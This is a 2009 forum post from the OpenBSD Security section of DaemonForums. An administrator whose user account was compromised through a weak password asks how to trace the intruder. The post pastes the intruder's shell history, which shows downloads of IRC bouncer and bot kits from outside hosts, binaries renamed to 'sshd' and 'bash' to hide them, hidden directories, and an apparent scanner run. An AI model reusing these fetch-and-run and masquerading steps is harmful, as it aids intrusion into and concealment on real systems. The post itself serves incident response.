DaemonForums  

Go Back   DaemonForums > OpenBSD > OpenBSD Security

OpenBSD Security Functionally paranoid!

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1   (View Single Post)  
Old 30th June 2009
knasbas knasbas is offline
Port Guard
 
Join Date: May 2008
Posts: 25
Default weak password=broken

I just found out that a user had a weak password and it was broken. How do i trace what a user been doing?
Only see brief info in .bash_history (below)
Any help at all is welcome, ive changed password and deleted the 2 directorys ive found.
Not a single hit on robotbsd in google makes me a bit worried.
Code:
ls
ps 'ux
uname
uname -a
uptime
wget
w
passwd
ls
uname -a
fetch www.psybnc.net/psyBNC-2.3.2-7.tar.gz
wget
wget www.psybnc.net/psyBNC-2.3.2-7.tar.gz
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
ls
pico menuconf
pico config.h
ls
pico psybncchk
ls
pico CHANGES
make
ls
pico psybnc.conf
ls
rm -rf salt.h
mv psybnc sshd
export PATH="."
sshd
ps -ux
ls
exit
ps-ux
ps -ux
ls
kill -9 29089
ps -ux
kill -9 28097
ps -ux
ls
cd psybnc
ls
pico psybnc.conf
ls
sshd
export PATH="."
sshd
ps -ux
ls
exit
ls
-ps -ux
ls
ps -ux
ls
kill -9 12813
ls
ps -ux
ls
cd psybnc
ls
mv sshd bash
./bash
ps -ux
kill -9 12169
ls
cd ..
ls
wget badry.uv.ro/robotlinux.tgz
ls
tar xvf robotlinux.tgz
cd ". .".l
ls
pico mech.set
./[kupdateb]
[kupdateb]
export PATH="."
[kupdateb]
ls
exit
ls
ls -a
cd /var/tmp
mkdir roxy
cd roxy/
ls
ls -a
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
cd ". .".b
ls
ls
pico m.session
ls
./[kupdateb]
chmod +x *
ls
[kupdateb]
./
[kupdateb]
ls
cd ..
ls
ls
exit
ls
ps -ux
cd psybnc
ls
cd ..
ls
rm -rf psybnc
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
make
ls
mv psybnc bash
./bash
ps -ux
ls
w
uname -a
uptime
exit
ls
ps -ux
ls -a
exit
ps -ux
uname -a
uptime
ls -a
ls -a
exit
ps -ux
uname -a
ls -a
cd ". .".l
ls
./[kupdateb]
ls
cd /var/tmp
ls
ls
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
cd ". .".b
ls
./[kupdateb]
ls
ps -ux
uname -a
uptime
ls
cd ..
ls
ls
wget bucus.tvn.hu/wtf.tgz
ls
ftp
tar xvf wtf.tgz
ls
cd wtf
ls
./a 21.21
rm -rf a1
rm -rf scam
./a 53.21
exit
Reply With Quote
 

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
A failure in password security TerryP Off-Topic 3 25th September 2008 03:19 AM
Set password for Folder mfaridi FreeBSD Security 6 5th September 2008 10:49 PM
Anyone Install Password Gorilla revzalot OpenBSD Installation and Upgrading 3 26th August 2008 03:58 AM
root password is blank mfaridi FreeBSD Security 10 16th May 2008 10:19 PM


All times are GMT. The time now is 06:05 AM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Content copyright © 2007-2010, the authors
Daemon image copyright ©1988, Marshall Kirk McKusick